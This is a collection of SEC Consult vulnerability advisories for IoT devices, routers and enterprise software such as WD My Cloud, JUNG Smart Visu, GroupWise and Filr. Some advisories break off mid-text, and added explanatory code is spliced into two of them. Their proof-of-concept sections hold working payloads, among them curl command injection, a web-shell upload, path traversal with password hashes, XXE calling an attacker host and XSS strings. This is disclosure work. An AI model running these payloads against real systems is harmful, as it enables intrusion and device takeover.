serious vulnerability, as it very likely leads to a full compromise of the
device.

2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded to the web server without any authentication.
It is possible for an attacker to upload a script that issues operating system
commands.

3. Cross Site Request Forgery (CSRF)
There is no anti-CSRF mechanism implemented in the firmware. Due to this, an
attacker can force a user to execute any action through any script. As the
vulnerabilities described in 1. and 2. do not need authentication, they can
be exploited via CSRF over the Internet as well!


Proof of concept:
-
1. Unauthenticated OS Command Injection
Below is a sample cURL request to execute an arbitrary OS command via one of
the vulnerable scripts.

$ curl
http://$IP/web/addons/jqueryFileTree.php?host=x=x=x=x=x\"\;
\; echo \"x


2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files on the webserver.

$ curl -F "file=@shell.php"
http://$IP/web/addons/upload.php?name=x==


3. Cross Site Request Forgery (CSRF)
There is no anti-CSRF mechanism implemented for all accessible scripts in the
firmware.


Vulnerable / tested versions:
-
The following device & firmware has been tested and found to be vulnerable:
2.11.157 (My Cloud EX2)

As the firmware used by all My Cloud devices is more or less similar, we
believe the other versions are also prone to the same vulnerabilities. This
could be verified by using the IoT Inspector software for automated firmware
analysis.


Vendor contact timeline:

2017-01-18: Contacting vendor through "WD Support - Create a Support Case"
page (https://support.wdc.com/support/case.aspx?lang=en).
Assigned ticket number - 011817-11728265.
2017-01-19: Vendor: replies to the ticket asking for more clarification.
2017-01-20: Replied to the vendor, requesting security contact and encryption
keys
2017-01-23: Vendor: "we don't have a security department that we could forward
this concern"
2017-01-23: Telling support that there seems to be a security contact by
referencing other WD advisories, requesting security contact again
2017-01-24: Vendor: asking for affected product name and firmware version.
2017-01-24: Providing list of affected product name and firmware versions,

SEC Consult SA-20170207 :: Path Traversal, Backdoor accounts & KNX group address password bypass in JUNG Smart Visu server

2017-02-07 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20170207-0 >
===
  title: Path Traversal, Backdoor accounts & KNX group address
 password bypass
product: JUNG Smart Visu Server
 vulnerable version: Firmware v1.0.804/1.0.830/1.0.832
  fixed version: Firmware v1.0.900
 CVE number: -
 impact: Critical
   homepage: http://www.jung.de/
  found: 2016-11-10
 by: T. Weber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"JUNG provides equipment and systems that win over by advanced technology,
sophisticated design, and a large variety of features. On the one hand,
our portfolio includes switches, socket outlets, dimmer, and observers.
On the other, it includes innovative systems for controlling features in
your home. From lighting, blind, or temperature control to wireless and
KNX technologies, door communication, and multimedia control, a large
range of applications is covered. In addition to comfort and security,
also the requirements regarding cost-effectiveness and energy efficiency
are met."

Source: http://www.jung.de/en/1828/company/company-portrait/


Business recommendation:

Attackers are able to gain root access through SSH with the credentials of
the backdoor user account. An attacker can also unlock the group address
protection for the KNX device mapping.

JUNG has provided updated firmware which should be installed immediately.

SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security professionals
and all identified issues have been resolved.


Vulnerability overview/description:
---
1) Path Traversal Vulnerability
The Smart Visu Server runs with root privileges and is vulnerable to path
traversal. This leads to full information disclosure of all files on the
system.

2) Backdoor Accounts
Two undocumented operating system user accounts are present on the appliance.
They can be used to gain access to the Smart Visu Server via SSH.

3) Group Address (GA) unlock without Password
As a protection feature, the KNX group addresses can be locked with a
user-defined password. This password can be removed by using a single PUT
request. An attacker can then completely change the configuration of the
connected devices (e.g. a light switch in the kitchen can be swapped with the
air conditioner).


Proof of concept:
-
1) Path Traversal Vulnerability
The Smart Visu Server is vulnerable to path traversal by sending the
following GET-Request:
 Request 
GET /SV-Home//..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1
Host: 
[...]

--- Response 
HTTP/1.1 200 OK
Content-Disposition: inline;filename="passwd"
[...]

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
-

2) Backdoor Accounts
Two undocumented operating system user accounts are present on the appliance.
They can be used to gain access to Smart Visu Server over SSH on Port 5.

Excerpt of the shadow file:
root:$6$Zcv.yVRg$0OfnoSEEWdP4K/2z5Mm/56nfGbdAPl4ZSm3oDWqn3fMD9cXfZCov7O/siheuYggHxuqHvZQ7nPSBM5BcbrH9n.:16840:0:9:7:::
daemon:*:15914:0:9:7:::
[...]
avahi:*:16541:0:9:7:::
jung:$6$1SblJl3F$q6h6vfSC.IataQSqDNGw0wGvV8m/x8uLozBIj4Yj.ZzMoHbaMvzb2tR.B45I/ajsWpwkTcCNGjSZsLdC9IuzD.:16714:0:9:7:::

3) Group Address (GA) unlock without Password
The following PUT request sends a JSON object to the server, which removes the
password:
 Request 
PUT /rest/items/knxcom_datastore HTTP/1.1
Host: 
[...]

{"groupNames":[],"name":"knxcom_datastore","label":"knxcom_datastore","type":"GroupItem","tags":["{\"lock_ga\":false}"]}
-


Vulnerable / tested versions:
-
Firmware version 1.0.804, 1.0.830 and 1.0.832 have been tested and found to be
vulnerable.


Vendor contact timeline:

2016-11-21: Contacting vendor through kundencen...@jung.de, ma

SEC Consult SA-20161128-0 :: DoS & heap-based buffer overflow in Guidance Software EnCase Forensic

2016-11-28 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20161128-0 >
===
  title: Denial of service & heap-based buffer overflow
product: Guidance Software EnCase Forensic Imager & EnCase Forensic
 vulnerable version: EnCase Forensic Imager<= 7.10
 EnCase Forensic (tested with version 7.08.00.137)
  fixed version: -
 CVE number: -
 impact: high
   homepage: https://www.guidancesoftware.com/encase-forensic-imager
  found: 2016-09-30
 by: Wolfgang Ettlinger (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"When time is short and you need to acquire entire volumes or selected
individual folders, EnCase Forensic Imager is your tool of choice. Based on
trusted, industry-standard EnCase Forensic technology, EnCase Forensic Imager:
* Is free to download and use
* Requires no installation
* Is a standalone product that does not require an EnCase Forensic license
* Enables acquisition of local drives (network drives are not able to be
  acquired with Imager)
* Provides easy viewing and browsing of potential evidence files, including
  folder structures and file metadata
* Can be deployed via USB stick and used to perform acquisition of a live
  device"

URL: https://www.guidancesoftware.com/encase-forensic-imager


Business recommendation:

SEC Consult recommends not to use EnCase Forensic Imager or the EnCase Forensic
Suite until a thorough security review has been performed by security
professionals and all identified issues have been resolved.


Vulnerability overview/description:
---
1) Denial of Service
Several manipulated hard disk images cause EnCase Forensic Imager to crash. A
suspect manipulating a hard drive could thus hinder an investigator from using
EnCase Forensic Imager to create hard disk images.
EnCase Forensic (v7) has been tested and found to be affected as well.

2) Heap-based buffer overflow
Using a manipulated ReiserFS image an attacker can overwrite heap memory on the
investigator's machine. Because of several restrictions SEC Consult was unable
to create an exploit that works reliably within a reasonable timeframe.
However, as with most heap-based buffer overflow vulnerabilities it is possible
that an attacker could gain arbitrary code execution nevertheless.


Proof of concept:
-
SEC Consult has created proof of concept disk images that will crash EnCase.
Those PoC images will not be released.

1) Denial of Service
The following list demonstrates cases that cause EnCase to crash. Investigators
would be unable to analyze the affected hard disk/partition/image using the
affected products:
 * Ext3:
   - Several conditions cause EnCase Forensic Imager to encounter a div/0
     exception. Disk images manipulated in the following ways demonstrate this
     issue. These crashes have not been further investigated as to whether
     code execution is possible.
     + number of blocks per group: 0x
     + total number of blocks: 0x
     + last mount path: 'A'*10
     + volume name: 'A'*10
     + block number of the superblock: 0
     + FS-Id: 'A'*10
   - Manipulating the inode structure size value (e.g. 0x) causes EnCase
     Forensic Imager to write beyond the limits of a previously allocated
     (VirtualAlloc) segment.
 * Iso9660:
   - If the length of a file name is specified such that it would exceed the
     end of the last block, EnCase Forensic Imager crashes while trying to read
     beyond an allocated segment.
 * ReiserFs:
   - When a block size below 0x200 is set, the application overwrites heap
     memory with attacker-supplied data.
 * GPT:
   - When an overly long name (in our setup longer than 0x3fc6) is specified
     for a partition, EnCase Forensic crashes, failing to read memory when
     trying to determine the length of the string. The partition table can be
     constructed in a way that it can also be used for storing data. However,
     an investigator using EnCase will not be able to analyze it.

2) Heap-based buffer overflow
The manipulated ReiserFs image that causes the application to overwrite heap
memory can be tuned to overwrite heap-data with attacker-controlled data.

The application calculates a value (here called "dev_block_count") as:

dev_block_count =
   blocksize from image (e.g. 0x200)
 / blocksize of reading device (typically 0x200)
 * number of blocks
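
The arithmetic above is what makes a block size below 0x200 dangerous: with C-style
integer division, an image block size smaller than the device block size divides to
zero, so dev_block_count becomes zero for any number of blocks. The block below is an
added illustration, not EnCase code and not taken from the advisory beyond the quoted
formula; that the result is used to size a buffer later filled with the image's own
byte count is an assumption (the advisory text is truncated before that point), and
the hardened variant is the check a parser of untrusted filesystem metadata would
want:

```python
DEVICE_BLOCK_SIZE = 0x200   # block size of the reading device, as given in the advisory


def dev_block_count(image_blocksize: int, block_count: int,
                    dev_blocksize: int = DEVICE_BLOCK_SIZE) -> int:
    """The calculation quoted in the advisory, with truncating integer division as
    in C. Any image block size below dev_blocksize yields 0 regardless of block_count."""
    return image_blocksize // dev_blocksize * block_count


def buffer_shortfall(image_blocksize: int, block_count: int,
                     dev_blocksize: int = DEVICE_BLOCK_SIZE) -> int:
    """Assumed consequence (not shown in the advisory): if a buffer is sized from
    dev_block_count but later filled with image_blocksize * block_count bytes, this
    many bytes would land past its end. 0 means the two sizes agree."""
    claimed = image_blocksize * block_count
    allocated = dev_block_count(image_blocksize, block_count, dev_blocksize) * dev_blocksize
    return claimed - allocated


def checked_dev_block_count(image_blocksize: int, block_count: int,
                            dev_blocksize: int = DEVICE_BLOCK_SIZE):
    """Hardened variant: only accept values the formula represents exactly.
    Returns None (caller treats the image as corrupt) instead of a truncated count."""
    if image_blocksize < dev_blocksize or image_blocksize % dev_blocksize != 0:
        return None   # smaller than, or not a multiple of, the device block size
    if block_count <= 0:
        return None
    return image_blocksize // dev_blocksize * block_count
```

A block size of 0x100 with 8 blocks gives dev_block_count 0 and a 0x800-byte shortfall;
a block size of 0x300 (not a multiple of 0x200) silently loses 0x100 bytes per block,
which is why the check rejects non-multiples as well as small values.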

.text:0

SEC Consult SA-20161114-0 :: Multiple vulnerabilities in I-Panda SolarEagle - Solar Controller Administration Software / MPPT Solar Controller SMART2

2016-11-14 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20161114-0 >
===
  title: Multiple vulnerabilities
product: I-Panda SolarEagle - Solar Controller Administration
 Software / MPPT Solar Controller SMART2
 vulnerable version: SolarEagle V2.00 / MPPT Solar Controller SMART2
  fixed version: -
 CVE number: -
 impact: Medium
   homepage: http://www.solarcontroller-inverter.com/
  found: 2016-09-03
 by: T. Weber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"ShenZhen I-Panda Electronics Co. Ltd. is developing power supply devices
such as UPS, power adapter and power inverter and also equipment for solar
systems. This equipment produced by I-Panda comprises solar panels/
controllers/inverters and also solar generator systems."

Source: http://www.solarcontroller-inverter.com/about-us.html


Business recommendation:

SEC Consult recommends not to use this product until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.


Vulnerability overview/description:
---
1) Broken Local Admin Authentication in SolarEagle V2.00
Attackers who have access to the locally installed software are able to
bypass the administrative login and can control the MPPT Solar Controller.

2) Missing Server Side Authentication in MPPT Solar Controller SMART2
Attackers who have access to the local network can send their own commands
to the MPPT Solar Controller and are able to control the device this way.

3) Unencrypted Communication in MPPT Solar Controller SMART2
Eavesdropping on the communication is possible, since unencrypted TCP is used
for all packets transferred between the controller and SolarEagle.

4) Denial of Service in MPPT Solar Controller SMART2
Attackers are able to disrupt an active connection as long as they want.


Proof of concept:
-
The vendor was not responsive, hence there is no fix available. The proof of
concept has been removed from this advisory.


Vulnerable / tested versions:
-
SolarEagle V2.00 / MPPT Solar Controller SMART2


Vendor contact timeline:

2016-09-12: Contacting vendor through email, sending responsible disclosure
policy, defining release deadline (10th November), asking for
encryption keys
2016-09-13: Contacting vendor through email, sending responsible disclosure
policy, defining release deadline (10th November), asking for
encryption keys
2016-09-13: Vendor: (Instant-Messenger) No encryption available. Offer to
send the advisory unencrypted; No Answer
2016-10-29: Offer to send the advisory unencrypted; No Answer
2016-11-03: Offer to send the advisory unencrypted; No Answer
2016-11-14: SEC Consult releases security advisory


Solution:
-
There is no fix available from the vendor as they did not respond.


Workaround:
---
No workaround


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm



SEC Consult SA-20161011-0 :: XXE vulnerability in RSA Enterprise Compromise Assessment Tool (ECAT)

2016-10-11 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20161011-0 >
===
  title: XML External Entity Injection (XXE)
product: RSA Enterprise Compromise Assessment Tool (ECAT)
 vulnerable version: 4.1.0.1
  fixed version: 4.1.2.0
 CVE Number: -
 impact: Medium
   homepage: https://www.rsa.com
  found: 2016-04-27
 by: Samandeep Singh (Office Singapore)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber threats.
With RSA's  award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities; and
ultimately, reduce IP theft, fraud, and cybercrime."

Source: https://www.rsa.com/en-us/company/about


Business recommendation:

By exploiting the XXE vulnerability, an attacker can get read access to the
filesystem of the system on which the RSA ECAT client is used and thus obtain
sensitive information from it. It is also possible to scan ports of internal
hosts and cause a DoS on the affected host.

SEC Consult recommends not to use the product until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.


Vulnerability overview/description:
---
1) XML External Entity Injection
The XML parser in use resolves external XML entities, which allows attackers
to read files and send requests to systems on the internal network (e.g. port
scanning). The vulnerability can be exploited by tricking the user of
the application into importing a whitelisting file with malicious XML code.


Proof of concept:
-
1) XML External Entity Injection (XXE)

The RSA ECAT client allows users to import whitelisting files in XML format.
By tricking the user to import an XML file with malicious XML code to the
application, it's possible to exploit an XXE vulnerability within the 
application.

For example, by importing the following XML code, arbitrary files can be read
from the client's system. The following code generates the connection request
from the client system to the attacker's system.

===

 
   http://[IP:port]/; >]>
===

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the
techniques described in:

https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf


Vulnerable / tested versions:
-
The XXE vulnerability has been verified to exist in the RSA ECAT software
version 4.1.0.1 which was the latest version available at the time of
discovery.


Vendor contact timeline:

2016-04-28: Vulnerabilities reported to the vendor by 3rd party
2016-06-23: Fixed by vendor in version 4.1.2 (ECAT-5972)
2016-10-11: SEC Consult releases security advisory


Solution:
-
Update to version 4.1.2.0


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm



SEC Consult SA-20160825-0 :: Multiple vulnerabilities in Micro Focus (Novell) GroupWise

2016-08-25 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20160825-0 >
===
  title: Multiple vulnerabilities
product: Micro Focus GroupWise
 vulnerable version: GroupWise 2014 R2 (<=SP1)
 GroupWise 2014
 (unsupported versions may be affected)
  fixed version: GroupWise 2014 R2 Service Pack 1 Hot Patch 1
 CVE number: CVE-2016-5760, CVE-2016-5761, CVE-2016-5762
 impact: critical
   homepage: https://www.novell.com/products/groupwise/
  found: 2016-07
 by: W. Ettlinger (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Micro Focus GroupWise is a complete collaboration software solution that
provides email, calendaring, instant messaging, task management, contact and
document management functions. GroupWise has long been praised by customers and
industry watchers for its security and reliability."

URL: https://www.novell.com/products/groupwise/


Business recommendation:

During a quick security check SEC Consult found three vulnerabilities in the
Micro Focus GroupWise server applications.

As these partly critical vulnerabilities were identified during a short time
frame, SEC Consult recommends conducting a thorough technical security audit.


Vulnerability overview/description:
---
1) Reflected cross site scripting in the administrator console (CVE-2016-5760)
Two reflected cross site scripting vulnerabilities have been identified in the
gwadmin-console application. An attacker could potentially take over an
administrator's session.

2) Persistent cross site scripting via emails (CVE-2016-5761)
By sending a single email to a victim an attacker could take over the victim's
email account. For a successful exploitation the victim has to click on a
link in an email opened in GroupWise WebAccess.

3) Heap-based Buffer Overflow / Integer Overflow (CVE-2016-5762)
By sending a crafted value for the username or the password to GroupWise
WebAccess or the GroupWise Post Office Agent during login an attacker can
overwrite heap memory. In order to exploit this vulnerability no user
authentication is required.
PLEASE NOTE: A successful exploitation of this vulnerability may allow an
attacker to execute code remotely. As SEC Consult only conducted a very quick
security check this has not been verified.


Proof of concept:
-
1) Reflected cross site scripting in the administrator console
The following links demonstrate reflected cross site scripting vulnerabilities:

https://testhost:9710/gwadmin-console/install/login.jsp?token=asdf%22%2balert%28%27xss%27%29%2b%22
https://testhost:9710/gwadmin-console/index.jsp#poa:%3Cimg%20src=x%20onerror=alert%28%27xss%27%29%3E

2) Persistent cross site scripting via emails
The following Python fragment demonstrates the generation of a hyperlink that,
when embedded into an HTML email, would, upon clicking it, open a new mail
dialog.

 snip 
msg = """
click me
""".replace('$charcode', ','.join(str(ord(x)) for x in list('idNewPopupMenu')))
 snip 

3) Heap-based Buffer Overflow / Integer Overflow
When a username or password longer than 65332 (2^16 - 3) is specified, an
overflow causes the Post Office Agent to allocate too little memory.

The following pseudocode shows how the memory to be allocated is calculated
based on the input length.

((uint16_t) (() + 3) & 0xFFFC) + 1)

Therefore, a value of 65533 would cause the application to allocate 1 byte. By
modifying this value accordingly, an attacker can cause the application to
allocate an arbitrary amount of memory.

The user-specified value is then copied into this buffer until a NUL-byte is
reached. This allows an attacker to write non-NUL bytes after the allocated
heap chunk.
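As an added example (not code from the advisory or from Micro Focus), the C below reproduces the 16-bit truncation in the size computation described above, flags the lengths for which the computed chunk is smaller than the input plus its NUL terminator, and shows the same rounding done with a length check. It assumes the term missing from the pseudocode is the byte length of the supplied username or password, and that max_len is a hypothetical, caller-chosen limit.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Added example, not code from the advisory or from the vendor.
 * Reconstructs the allocation-size arithmetic the advisory describes:
 * (input length + 3) is truncated to 16 bits, rounded down to a multiple
 * of 4 (mask 0xFFFC) and incremented by one for the terminator.
 * ASSUMPTION: the missing term in the advisory's pseudocode is the byte
 * length of the user-supplied username or password.
 */
size_t truncated_alloc_size(size_t input_len)
{
    /* The cast to uint16_t is where the overflow happens: a length of
       65533 makes (len + 3) wrap to 0 before the mask is applied, so the
       function returns 1. */
    uint16_t rounded = (uint16_t)(input_len + 3) & 0xFFFC;
    return (size_t)rounded + 1;
}

/* True when the computed allocation cannot hold the input plus its NUL
   terminator, i.e. a copy that stops only at the NUL byte would run past
   the end of the heap chunk. */
bool allocation_undersized(size_t input_len)
{
    return truncated_alloc_size(input_len) < input_len + 1;
}

/*
 * Hardened variant: the same rounding, carried out in size_t with an
 * explicit length limit, so the result is always large enough for the
 * input and its terminator. max_len is a hypothetical policy limit chosen
 * by the caller (e.g. the longest username the server accepts), kept far
 * below SIZE_MAX so the rounding itself cannot wrap.
 * Returns false when the input must be rejected.
 */
bool checked_alloc_size(size_t input_len, size_t max_len, size_t *out)
{
    if (input_len > max_len)
        return false;
    /* Round the length up to the next multiple of 4, then add the NUL. */
    size_t rounded = (input_len + 3) & ~(size_t)3;
    *out = rounded + 1;
    return true;
}

/* Convenience wrapper: the checked size, or 0 when the input is rejected. */
size_t checked_alloc_size_or_zero(size_t input_len, size_t max_len)
{
    size_t out = 0;
    return checked_alloc_size(input_len, max_len, &out) ? out : 0;
}
```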


Vulnerable / tested versions:
-
The version 2014 R2 SP1 of Micro Focus GroupWise was found to be
vulnerable. This version was the latest version at the time of the discovery.


Vendor contact timeline:

2016-07-05: Contacting vendor through secur...@novell.com
2016-07-06: Micro Focus was able to reproduce the vulnerabilities
2016-07-25: Micro Focus: The issues have been resolved in development
2016-08-12: Micro Focus: Hotpatch is currently undergoing QA
2016-08-25: Coordinated release of security advisory


Solution:
-
The "GroupWise 2014 R2 Service Pack 1 Hot Patch 1" should be applied
immediately. This upda

SEC Consult SA-20160725-0 :: Multiple vulnerabilities in Micro Focus (Novell) Filr

2016-07-25 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20160725-0 >
===
  title: Multiple vulnerabilities
product: Micro Focus (former Novell) Filr Appliance
 vulnerable version: Filr 2 <=2.0.0.421, Filr 1.2 <= 1.2.0.846
  fixed version: Filr 2 v2.0.0.465, Filr 1.2 v1.2.0.871
 CVE number: CVE-2016-1607, CVE-2016-1608, CVE-2016-1609
 CVE-2016-1610, CVE-2016-1611
 impact: critical
   homepage: https://www.novell.com/products/filr/
  found: 2016-05-23
 by: W. Ettlinger (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"Unlike other mobile file access and collaborative file sharing solutions, Micro
Focus Filr has been designed with the enterprise in mind, resulting in less
administration, better security and more productive users."

URL: https://www.novell.com/products/filr/


Business recommendation:

During a very quick security check several vulnerabilities with high impact
have been discovered. SEC Consult recommends to immediately apply the patches
provided by Micro Focus to address these issues.

Please note that since SEC Consult did not conduct a thorough technical security
check SEC Consult cannot make a statement regarding the overall security of the
Micro Focus Filr appliance.


Vulnerability overview/description:
---
During a quick security check several vulnerabilities have been identified that
ultimately allow an attacker to completely compromise the appliance:

1) Cross Site Request Forgery (CSRF) - CVE-2016-1607
Several functions within the appliance's administrative interface lack protection
against CSRF attacks. This allows an attacker who targets an authenticated
administrator to reconfigure the appliance.

2) OS Command Injection - CVE-2016-1608
The appliance administrative interface allows an authenticated attacker to
execute arbitrary operating system commands. Please note that an attacker can
combine this vulnerability with vulnerability #1. In this scenario, an attacker
does not need to be authenticated.

3) Insecure System Design
The appliance uses a Jetty application server to provide the appliance
administration interface. This application server is started as the superuser
"root". Please note that combined with vulnerability #1 and #2 an attacker can
run commands as the superuser "root" without the need for any authentication.
For vendor remark on #3 see solution section.

4) Persistent Cross-Site Scripting - CVE-2016-1609
The Filr web interface uses a blacklist filter to try to strip any JavaScript
code from user input. However, this filter can be bypassed to persistently
inject JavaScript code into the Filr web interface.

5) Missing Cookie Flags
The httpOnly cookie flag is not set for any session cookies set by both the
administrative appliance web interface and the Filr web interface. Please note
that combined with vulnerability #4 an attacker can steal session cookies of
both the appliance administration interface and the Filr web interface (since
cookies are shared across ports).
For vendor remark on #5 see solution section.

6) Authentication Bypass - CVE-2016-1610
An unauthenticated attacker is able to upload email templates.

7) Path Traversal - CVE-2016-1610
The functionality that allows an administrator to upload email templates fails
to restrict the directory the templates are uploaded to. Please note that
combined with vulnerability #6 an attacker is able to upload arbitrary files with
the permissions of the system user "wwwrun".

8) Insecure File Permissions - CVE-2016-1611
A file that is run upon system user login is world-writeable. This allows a
local attacker with restricted privileges to inject commands that are being
executed as privileged users as soon as they log into the system. Please note
that combined with vulnerabilities #6 and #7 an unauthenticated attacker can
inject commands that are executed as privileged system users (e.g. root) using
the Filr web interface.


Proof of concept:
-
1, 2, 3)
The following HTML fragment demonstrates that using a CSRF attack (#1) system
commands can be injected (#2) that are executed as the user root (#3):

- snip -

  

  
  
  
  
  
  

  

- snip -

4)
The following string demonstrates how the XSS filter can be circumvented:


This string can e.g. be used by a restricted user in the "phone" field of the
user prof

SEC Consult SA-20160624-0 :: ASUS DSL-N55U router XSS and information disclosure

2016-06-24 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20160624-0 >
===
  title: XSS and information disclosure vulnerability
product: ASUS DSL-N55U router
 vulnerable version: 3.0.0.4.376_2736
  fixed version: 3.0.0.4_380_3679
 CVE number: requested
 impact: Medium
   homepage: https://www.asus.com/
  found: 2016-04-12
 by: P. Morimoto (Office Bangkok)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"ASUS has long been at the forefront of this growth and while the company
started life as a humble motherboard manufacturer with just a handful of
employees, it is now the leading technology company in Taiwan with over
12,500 employees worldwide. ASUS makes products in almost every area of
Information Technology too, including PC components, peripherals,
notebooks, tablets, servers and smartphones."

Source: https://www.asus.com/sg/About_ASUS/The_Meaning_of_ASUS


Business recommendation:

SEC Consult recommends not to use this device until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.


Vulnerability overview/description:
---
1. Reflected Cross-Site Scripting
The vulnerability exists in the "httpd" binary in the ASUS DSL-N55U firmware.
If the web path is longer than 50 characters, it will redirect a user to
the cloud_sync.asp page with the web path as a value of a GET parameter.

Due to the lack of input validation, an attacker can insert malicious JavaScript
code to be executed under a victim's browser context.

No authentication is required.

2. Remote DHCP Information Disclosure
An unauthenticated attacker can gain access to DHCP information including
the hostname and private IP addresses of the local machines connected to the
router from the WAN IP address.


Proof of concept:
-
1. Reflected Cross-Site Scripting
HTTP Request:
GET /111'+alert('XSS')+' HTTP/1.1
Host: 

HTTP Response:
HTTP/1.0 200 OK
Server: httpd
Date: Tue, 12 Apr 2016 09:04:48 GMT
Content-Type: text/html
Connection: close
location.href='/cloud_sync.asp?flag=111'+alert('XSS')+'';


2. Remote DHCP Information Disclosure
HTTP Request:
GET /Nologin.asp HTTP/1.1
Host: 

HTTP Response:
HTTP/1.0 200 Ok
Server: httpd
[...]
var dhcpLeaseInfo = [['', ''],['',
''],['', '']];;
function initial(){
[...]

Vulnerable / tested versions:
-
The following firmware has been tested which was the most recent version
at the time of discovery:

- 3.0.0.4.376_2736 (2015/01/19 update)

URL: https://www.asus.com/support/Download/11/2/0/75/aOKU9r3fCf3pyi95/29/


Vendor contact timeline:

2016-06-02: Contacting vendor through priv...@asus.com and netad...@asus.com.tw.
2016-06-03: ASUS responds and establishes encrypted communication channel.
2016-06-06: Sending PGP encrypted security advisory to ASUS.
2016-06-20: Vulnerability is fixed in beta firmware.
2016-06-24: Public release of the advisory.


Solution:
-
Upgrade to firmware version 3.0.0.4_380_3679 or later.


Workaround:
---
No workaround available.


Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm



SEC Consult SA-20160602-0 :: Multiple critical vulnerabilities in Ubee EVW3226 Advanced wireless voice gateway

2016-06-02 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20160602-0 >
===
  title: Multiple critical vulnerabilities
product: Ubee EVW3226 Advanced wireless voice gateway
 vulnerable version: Firmware EVW3226_1.0.20
  fixed version: -
 CVE number: -
 impact: critical
   homepage: http://www.ubeeinteractive.com
  found: 2016-01-09
 by: Manuel Hofer (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Montreal - Moscow
 Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com
===

Vendor description:
---
"Ubee Interactive is on a mission. A mission that began with the development
of our industry-defining line of DOCSIS cable modems. And one that continues
with a drive toward becoming the leading business-to-business provider of
broadband connectivity products and solutions worldwide. Our current product
portfolio includes data, voice, video, mobility and portable devices."

Source: http://www.ubeeinteractive.com/products/cable/evw3226


Business recommendation:

Network security should not depend on the security of independent devices, such
as cable modems. An attacker with root access to such a device can enable
attacks on connected networks, such as administrative networks managed by the
ISP or other cable modem users.

Vulnerabilities described in this security advisory might be exploited in
combination with other vulnerabilities not associated with this product (XSS in
web forums accessing the modem, malvertising, etc.).

It is highly recommended by SEC Consult not to use this device until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.

It is assumed that further critical vulnerabilities exist within the firmware
of this device.


Vulnerability overview/description:
---
1) Missing authentication for configuration download
The admin interface does not explicitly require any authentication prior to
downloading a previously requested configuration backup file.

2) Plaintext storage of administrative password
The password for the user "admin" is stored in clear text. An attacker with
access to the configuration file or the device itself can easily obtain this
password. By exploiting issue 1) the clear text admin password can be retrieved.

3) "Encrypted" configuration backup not actually encrypted
A certain built-in cgi action [removed] asks the user to provide a password in
order to "encrypt your configuration's backup". A quick analysis of this
function has shown that the configuration backup does not actually get
encrypted; only a file "pass.txt" containing the password provided by the
user, in clear text, is appended to the archive. This promotes a false sense of
security, as an attacker with access to the configuration file can easily
obtain the clear text password for the admin interface.

4) Authenticated arbitrary file upload leading to arbitrary command execution
By analyzing the configuration file format and further exploiting a known
vulnerability inside the busybox tar implementation it is possible to upload
arbitrary files to the device. This enables an attacker to execute arbitrary
system commands and gain full root access on the device.

5) Heap-based buffer overflow vulnerability in URL decoding
The function responsible for URL decoding allocates the buffer for the decoded
string based on the number of '%' characters in the request string. This leads
to a heap based buffer overflow.


Proof of concept:
